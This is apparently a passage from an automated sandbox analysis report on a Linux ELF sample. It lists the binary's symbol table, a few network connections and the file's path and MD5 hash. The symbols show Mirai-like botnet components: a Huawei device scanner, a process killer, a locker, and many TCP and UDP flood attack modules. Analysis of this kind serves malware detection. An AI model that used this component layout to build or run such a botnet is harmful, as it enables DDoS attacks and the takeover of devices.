                                                                      fseeko.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                      fseeko64.symtab0x27fd4448FUNC<unknown>DEFAULT2
                                                                      fseeko64.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                      fstat.symtab0x22448116FUNC<unknown>DEFAULT2
                                                                      fstat.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                      fwrite_unlocked.symtab0x1b9ac196FUNC<unknown>DEFAULT2
                                                                      fwrite_unlocked.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                      get_option_hex_string.symtab0x12344104FUNC<unknown>DEFAULT2
                                                                      get_option_ip.symtab0x12530112FUNC<unknown>DEFAULT2
                                                                      get_option_number.symtab0x124c0112FUNC<unknown>DEFAULT2
                                                                      getc.symtab0x25a9c320FUNC<unknown>DEFAULT2
                                                                      getc_unlocked.symtab0x263b0344FUNC<unknown>DEFAULT2
                                                                      getdents.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                      getdents64.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                      getdtablesize.symtab0x2257440FUNC<unknown>DEFAULT2
                                                                      getdtablesize.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                      getegid.symtab0x2259c32FUNC<unknown>DEFAULT2
                                                                      getegid.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                      geteuid.symtab0x225bc32FUNC<unknown>DEFAULT2
                                                                      geteuid.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                      getgid.symtab0x225dc32FUNC<unknown>DEFAULT2
                                                                      getgid.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                      getpagesize.symtab0x2260456FUNC<unknown>DEFAULT2
                                                                      getpagesize.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                      getpid.symtab0x2150488FUNC<unknown>DEFAULT2
                                                                      getpid.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                      getppid.symtab0x19c7832FUNC<unknown>DEFAULT2
                                                                      getppid.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                      getrlimit.symtab0x2264492FUNC<unknown>DEFAULT2
                                                                      getrlimit.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                      getsockname.symtab0x1e62836FUNC<unknown>DEFAULT2
                                                                      getsockname.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                      getsockopt.symtab0x1e64c44FUNC<unknown>DEFAULT2
                                                                      getsockopt.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                      getuid.symtab0x226a032FUNC<unknown>DEFAULT2
                                                                      getuid.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                      greip.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                      h_errno.symtab0x44TLS<unknown>DEFAULT6
                                                                      hex_to_text.symtab0x11d3c236FUNC<unknown>DEFAULT2
                                                                      huawei.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                      huawei_fake_time.symtab0x3c5104OBJECT<unknown>DEFAULT12
                                                                      huawei_init.symtab0x135002912FUNC<unknown>DEFAULT2
                                                                      huawei_kill.symtab0x1341028FUNC<unknown>DEFAULT2
                                                                      huawei_rsck.symtab0x3c4e44OBJECT<unknown>DEFAULT12
                                                                      huawei_scanner_pid.symtab0x3c4e04OBJECT<unknown>DEFAULT12
                                                                      huawei_scanner_rawpkt.symtab0x3c4e840OBJECT<unknown>DEFAULT12
                                                                      huawei_setup_connection.symtab0x1342c212FUNC<unknown>DEFAULT2
                                                                      index.symtab0x267b4524FUNC<unknown>DEFAULT2
                                                                      inet_addr.symtab0x1e51c40FUNC<unknown>DEFAULT2
                                                                      inet_aton.symtab0x26e9c244FUNC<unknown>DEFAULT2
                                                                      inet_aton.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                      inet_makeaddr.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                      inet_ntop.symtab0x1e25c704FUNC<unknown>DEFAULT2
                                                                      inet_ntop4.symtab0x1e0cc400FUNC<unknown>DEFAULT2
                                                                      inet_pton.symtab0x1dea0556FUNC<unknown>DEFAULT2
                                                                      inet_pton4.symtab0x1ddd4196FUNC<unknown>DEFAULT2
                                                                      init_static_tls.symtab0x275ac120FUNC<unknown>DEFAULT2
                                                                      initfini.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                      initfini.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                      initstate.symtab0x20040124FUNC<unknown>DEFAULT2
                                                                      initstate_r.symtab0x202ac244FUNC<unknown>DEFAULT2
                                                                      ioctl.symtab0x27a18228FUNC<unknown>DEFAULT2
                                                                      ioctl.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                      isatty.symtab0x26e0832FUNC<unknown>DEFAULT2
                                                                      isatty.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                      key.symtab0x3c24032OBJECT<unknown>DEFAULT11
                                                                      key.symtab0x3c27032OBJECT<unknown>DEFAULT11
                                                                      kill.symtab0x19ca092FUNC<unknown>DEFAULT2
                                                                      kill.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                      kill_head.symtab0x3c4dc4OBJECT<unknown>DEFAULT12
                                                                      kill_pid.symtab0x3c4d84OBJECT<unknown>DEFAULT12
                                                                      kill_port.symtab0x140601412FUNC<unknown>DEFAULT2
                                                                      killer.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                      libc-cancellation.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                      libc-lowlevellock.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                      libc-tls.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                      listen.symtab0x1e67828FUNC<unknown>DEFAULT2
                                                                      listen.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                      llseek.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                      locker.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                      lookup_domain.symtab0x112b01292FUNC<unknown>DEFAULT2
                                                                      lseek.symtab0x226c896FUNC<unknown>DEFAULT2
                                                                      lseek.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                      lseek64.symtab0x28544124FUNC<unknown>DEFAULT2
                                                                      main.symtab0x103402472FUNC<unknown>DEFAULT2
                                                                      main.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                      malloc.symtab0x1eb0c2436FUNC<unknown>DEFAULT2
                                                                      malloc.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                      malloc_trim.symtab0x1fdf048FUNC<unknown>DEFAULT2
                                                                      malware_scanner.symtab0x12f4c1020FUNC<unknown>DEFAULT2
                                                                      mbrtowc.symtab0x27c3c168FUNC<unknown>DEFAULT2
                                                                      mbrtowc.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                      mbsnrtowcs.symtab0x27cec220FUNC<unknown>DEFAULT2
                                                                      mbsnrtowcs.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                      mbstate.5063.symtab0x3f0388OBJECT<unknown>DEFAULT12
                                                                      mbstate.5064.symtab0x3f0408OBJECT<unknown>DEFAULT12
                                                                      memchr.symtab0x26628280FUNC<unknown>DEFAULT2
                                                                      memcpy.symtab0x1c09c4212FUNC<unknown>DEFAULT2
                                                                      memmove.symtab0x1bab81508FUNC<unknown>DEFAULT2
                                                                      mempcpy.symtab0x2851c32FUNC<unknown>DEFAULT2
                                                                      mempcpy.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                      memrchr.symtab0x26a80256FUNC<unknown>DEFAULT2
                                                                      memrchr.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                      memset.symtab0x1d144416FUNC<unknown>DEFAULT2
                                                                      messages.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                      mmap.symtab0x22730108FUNC<unknown>DEFAULT2
                                                                      mmap.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                      mremap.symtab0x227a4104FUNC<unknown>DEFAULT2
                                                                      mremap.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                      munmap.symtab0x2281492FUNC<unknown>DEFAULT2
                                                                      munmap.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                      mylock.symtab0x3c2c424OBJECT<unknown>DEFAULT11
                                                                      mylock.symtab0x3c2dc24OBJECT<unknown>DEFAULT11
                                                                      nan_inf_str.2499.symtab0x2aec021OBJECT<unknown>DEFAULT4
                                                                      nan_inf_str.6640.symtab0x2aeb011OBJECT<unknown>DEFAULT4
                                                                      nanosleep.symtab0x228d472FUNC<unknown>DEFAULT2
                                                                      nanosleep.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                      nil_string.symtab0x2a0406OBJECT<unknown>DEFAULT4
                                                                      nonce.symtab0x3c26012OBJECT<unknown>DEFAULT11
                                                                      nonce.symtab0x3c29012OBJECT<unknown>DEFAULT11
                                                                      ntop.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                      nvr.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                      object.4768.symtab0x3c49c24OBJECT<unknown>DEFAULT12
                                                                      open.symtab0x21840132FUNC<unknown>DEFAULT2
                                                                      opendir.symtab0x1a324228FUNC<unknown>DEFAULT2
                                                                      opendir.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                      p.4751.symtab0x3c22c0OBJECT<unknown>DEFAULT11
                                                                      parse_config.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                      prctl.symtab0x19d04104FUNC<unknown>DEFAULT2
                                                                      prctl.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                      prefix.6476.symtab0x2a05012OBJECT<unknown>DEFAULT4
                                                                      program_invocation_name.symtab0x3c3a84OBJECT<unknown>DEFAULT11
                                                                      program_invocation_short_name.symtab0x3c3a44OBJECT<unknown>DEFAULT11
                                                                      ptrace.symtab0x19d74192FUNC<unknown>DEFAULT2
                                                                      ptrace.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                      qual_chars.symtab0x2ae7018OBJECT<unknown>DEFAULT4
                                                                      qual_chars.6485.symtab0x2a06820OBJECT<unknown>DEFAULT4
                                                                      raise.symtab0x21564264FUNC<unknown>DEFAULT2
                                                                      raise.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                      rand.symtab0x1ff4016FUNC<unknown>DEFAULT2
                                                                      rand.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                      rand.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                      rand_alphastr.symtab0x10f40356FUNC<unknown>DEFAULT2
                                                                      rand_bytes.symtab0x11af852FUNC<unknown>DEFAULT2
                                                                      rand_init.symtab0x10ee888FUNC<unknown>DEFAULT2
                                                                      rand_next.symtab0x10e80104FUNC<unknown>DEFAULT2
                                                                      rand_next_range.symtab0x110a4124FUNC<unknown>DEFAULT2
                                                                      rand_str.symtab0x11120344FUNC<unknown>DEFAULT2
                                                                      random.symtab0x1ff58108FUNC<unknown>DEFAULT2
                                                                      random.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                      random_poly_info.symtab0x2ad1440OBJECT<unknown>DEFAULT4
                                                                      random_r.symtab0x20124152FUNC<unknown>DEFAULT2
                                                                      random_r.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                      randtbl.symtab0x3c2f4128OBJECT<unknown>DEFAULT11
                                                                      read.symtab0x21948132FUNC<unknown>DEFAULT2
                                                                      readdir.symtab0x1a4c0184FUNC<unknown>DEFAULT2
                                                                      readdir.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                      readdir64.symtab0x22ad0188FUNC<unknown>DEFAULT2
                                                                      readdir64.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                      readlink.symtab0x19e3c96FUNC<unknown>DEFAULT2
                                                                      readlink.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                      realloc.symtab0x1f5bc916FUNC<unknown>DEFAULT2
                                                                      realloc.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                      recv.symtab0x1e69492FUNC<unknown>DEFAULT2
                                                                      recv.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                      recvfrom.symtab0x1e6f096FUNC<unknown>DEFAULT2
                                                                      recvfrom.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                      register-atfork.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                      reportkill.symtab0x13348200FUNC<unknown>DEFAULT2
                                                                      resolver.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                      rewinddir.symtab0x1a580104FUNC<unknown>DEFAULT2
                                                                      rewinddir.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                      rindex.symtab0x269c0192FUNC<unknown>DEFAULT2
                                                                      rt_sigaction.symtab0x222c4104FUNC<unknown>DEFAULT2
                                                                      sbrk.symtab0x22924108FUNC<unknown>DEFAULT2
                                                                      sbrk.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                      sc_getc.symtab0x2501020FUNC<unknown>DEFAULT2
                                                                      scan_getwc.symtab0x24760232FUNC<unknown>DEFAULT2
                                                                      select.symtab0x19f0c84FUNC<unknown>DEFAULT2
                                                                      select.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                      send.symtab0x1e75092FUNC<unknown>DEFAULT2
                                                                      send.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                      sendto.symtab0x1e7ac96FUNC<unknown>DEFAULT2
                                                                      sendto.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                      setjmp.symtab0x223344FUNC<unknown>DEFAULT2
                                                                      setsid.symtab0x19f6880FUNC<unknown>DEFAULT2
                                                                      setsid.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                      setsockopt.symtab0x1e80c44FUNC<unknown>DEFAULT2
                                                                      setsockopt.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                      setstate.symtab0x1ffc4124FUNC<unknown>DEFAULT2
                                                                      setstate_r.symtab0x203a0276FUNC<unknown>DEFAULT2
                                                                      sigaction.symtab0x221bc264FUNC<unknown>DEFAULT2
                                                                      sigaction.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                      sigaddset.symtab0x1e86472FUNC<unknown>DEFAULT2
                                                                      sigaddset.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                      sigempty.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                      sigemptyset.symtab0x1e8ac16FUNC<unknown>DEFAULT2
                                                                      sigjmp.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                      signal.symtab0x1e8c4168FUNC<unknown>DEFAULT2
                                                                      signal.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                      sigprocmask.symtab0x19fc0172FUNC<unknown>DEFAULT2
                                                                      sigprocmask.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                      sigsetops.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                      sleep.symtab0x21674336FUNC<unknown>DEFAULT2
                                                                      sleep.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                      snprintf.symtab0x1a64c48FUNC<unknown>DEFAULT2
                                                                      snprintf.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                      socket.symtab0x1e83836FUNC<unknown>DEFAULT2
                                                                      socket.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                      spec_allowed.symtab0x2ae9016OBJECT<unknown>DEFAULT4
                                                                      spec_and_mask.6484.symtab0x2a07c16OBJECT<unknown>DEFAULT4
                                                                      spec_base.symtab0x2aea015OBJECT<unknown>DEFAULT4
                                                                      spec_base.6475.symtab0x2a0607OBJECT<unknown>DEFAULT4
                                                                      spec_chars.symtab0x2ae5823OBJECT<unknown>DEFAULT4
                                                                      spec_chars.6481.symtab0x2a0d821OBJECT<unknown>DEFAULT4
                                                                      spec_flags.symtab0x2ae504OBJECT<unknown>DEFAULT4
                                                                      spec_flags.6480.symtab0x2a0f08OBJECT<unknown>DEFAULT4
                                                                      spec_or_mask.6483.symtab0x2a08c16OBJECT<unknown>DEFAULT4
                                                                      spec_ranges.symtab0x2ae888OBJECT<unknown>DEFAULT4
                                                                      spec_ranges.6482.symtab0x2a0a09OBJECT<unknown>DEFAULT4
                                                                      sprintf.symtab0x2342c52FUNC<unknown>DEFAULT2
                                                                      sprintf.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                      srand.symtab0x200bc104FUNC<unknown>DEFAULT2
                                                                      srandom.symtab0x200bc104FUNC<unknown>DEFAULT2
                                                                      srandom_r.symtab0x201bc232FUNC<unknown>DEFAULT2
                                                                      srv_addr.symtab0x3f04c16OBJECT<unknown>DEFAULT12
                                                                      sscanf.symtab0x1b8c848FUNC<unknown>DEFAULT2
                                                                      sscanf.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                      static_dtv.symtab0x3eaf8512OBJECT<unknown>DEFAULT12
                                                                      static_map.symtab0x3f00052OBJECT<unknown>DEFAULT12
                                                                      static_slotinfo.symtab0x3ecf8776OBJECT<unknown>DEFAULT12
                                                                      stderr.symtab0x3c3b84OBJECT<unknown>DEFAULT11
                                                                      stdin.symtab0x3c3b04OBJECT<unknown>DEFAULT11
                                                                      stdout.symtab0x3c3b44OBJECT<unknown>DEFAULT11
                                                                      strchr.symtab0x267b4524FUNC<unknown>DEFAULT2
                                                                      strchrnul.symtab0x26b80260FUNC<unknown>DEFAULT2
                                                                      strchrnul.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                      strcmp.symtab0x1d378648FUNC<unknown>DEFAULT2
                                                                      strcoll.symtab0x1d378648FUNC<unknown>DEFAULT2
                                                                      strcpy.symtab0x1d668804FUNC<unknown>DEFAULT2
                                                                      strcspn.symtab0x26c8460FUNC<unknown>DEFAULT2
                                                                      strcspn.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                      strerror_r.symtab0x1dca8300FUNC<unknown>DEFAULT2
                                                                      strlen.symtab0x1d9f4120FUNC<unknown>DEFAULT2
                                                                      strncmp.symtab0x26cc0244FUNC<unknown>DEFAULT2
                                                                      strncmp.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                      strnlen.symtab0x1da6c244FUNC<unknown>DEFAULT2
                                                                      strnlen.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                      strrchr.symtab0x269c0192FUNC<unknown>DEFAULT2
                                                                      strspn.symtab0x26db484FUNC<unknown>DEFAULT2
                                                                      strspn.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                      strstr.symtab0x1db60288FUNC<unknown>DEFAULT2
                                                                      strstr.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                      strtol.symtab0x204cc20FUNC<unknown>DEFAULT2
                                                                      strtol.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                      sysconf.symtab0x20b3c1140FUNC<unknown>DEFAULT2
                                                                      sysconf.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                      sysinfo.symtab0x1a07488FUNC<unknown>DEFAULT2
                                                                      sysinfo.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                      sysv_signal.symtab0x1e9f4128FUNC<unknown>DEFAULT2
                                                                      sysv_signal.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                      tcgetattr.symtab0x26e28108FUNC<unknown>DEFAULT2
                                                                      tcgetattr.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                      tcp.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                      tcp_ack.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                      tcp_brazilian_handshake.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                      tcp_bypass.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                      tcp_handshake.symtab0x11fb8908FUNC<unknown>DEFAULT2
                                                                      tcp_socket.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                      tcp_socket_hold.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                      tcp_stomp.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                      tcp_syn.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                      tcp_syn_data.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                      tcp_wra.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                      tcpcsum.symtab0x15550216FUNC<unknown>DEFAULT2
                                                                      telnet.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                      terminate_kill_process.symtab0x12f2044FUNC<unknown>DEFAULT2
                                                                      time.symtab0x1a0cc40FUNC<unknown>DEFAULT2
                                                                      time.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                      times.symtab0x2299040FUNC<unknown>DEFAULT2
                                                                      times.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                      type_codes.symtab0x2a0aa24OBJECT<unknown>DEFAULT4
                                                                      type_sizes.symtab0x2a0c812OBJECT<unknown>DEFAULT4
                                                                      udp_bypass.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                      udp_gudp.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                      udp_hex.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                      udp_openvpn.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                      udp_plain.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                      udp_raknet.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                      udp_raw.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                      udp_vse.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                      ungetc.symtab0x27dec480FUNC<unknown>DEFAULT2
                                                                      ungetc.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                      unknown.1356.symtab0x2a17814OBJECT<unknown>DEFAULT4
                                                                      unlink.symtab0x1a0fc88FUNC<unknown>DEFAULT2
                                                                      unlink.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                      unsafe_state.symtab0x3c37420OBJECT<unknown>DEFAULT11
                                                                      updater.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                      usleep.symtab0x20fb072FUNC<unknown>DEFAULT2
                                                                      usleep.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                      util.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                      vfscanf.symtab0x248481992FUNC<unknown>DEFAULT2
                                                                      vfscanf.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                      vsnprintf.symtab0x1a67c164FUNC<unknown>DEFAULT2
                                                                      vsnprintf.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                      vsscanf.symtab0x1b8f8112FUNC<unknown>DEFAULT2
                                                                      vsscanf.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                      w.symtab0x3c4cc4OBJECT<unknown>DEFAULT12
                                                                      wcrtomb.symtab0x22f8076FUNC<unknown>DEFAULT2
                                                                      wcrtomb.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                      wcsnrtombs.symtab0x22ff0192FUNC<unknown>DEFAULT2
                                                                      wcsnrtombs.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                      wcsrtombs.symtab0x22fcc28FUNC<unknown>DEFAULT2
                                                                      wcsrtombs.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                      write.symtab0x218c4132FUNC<unknown>DEFAULT2
                                                                      x.symtab0x3c4c04OBJECT<unknown>DEFAULT12
                                                                      xdigits.5483.symtab0x2ad0017OBJECT<unknown>DEFAULT4
                                                                      xor_add.symtab0x145e4120FUNC<unknown>DEFAULT2
                                                                      xor_init.symtab0x1465c424FUNC<unknown>DEFAULT2
                                                                      xstatconv.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                                      y.symtab0x3c4c44OBJECT<unknown>DEFAULT12
                                                                      z.symtab0x3c4c84OBJECT<unknown>DEFAULT12
                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                      Apr 19, 2024 17:05:53.090805054 CEST42836443192.168.2.2391.189.91.43
                                                                      Apr 19, 2024 17:05:53.858736038 CEST4251680192.168.2.23109.202.202.202
                                                                      Apr 19, 2024 17:06:08.704830885 CEST43928443192.168.2.2391.189.91.42
                                                                      Apr 19, 2024 17:06:18.943331003 CEST42836443192.168.2.2391.189.91.43
                                                                      Apr 19, 2024 17:06:25.086649895 CEST4251680192.168.2.23109.202.202.202
                                                                      Apr 19, 2024 17:06:49.659300089 CEST43928443192.168.2.2391.189.91.42
                                                                      Apr 19, 2024 17:07:10.136166096 CEST42836443192.168.2.2391.189.91.43

                                                                      System Behavior

                                                                      Start time (UTC):15:05:49
                                                                      Start date (UTC):19/04/2024
                                                                      Path:/tmp/JGG1a56dcB.elf
                                                                      Arguments:/tmp/JGG1a56dcB.elf
                                                                      File size:4379400 bytes
                                                                      MD5 hash:7dc1c0e23cd5e102bb12e5c29403410e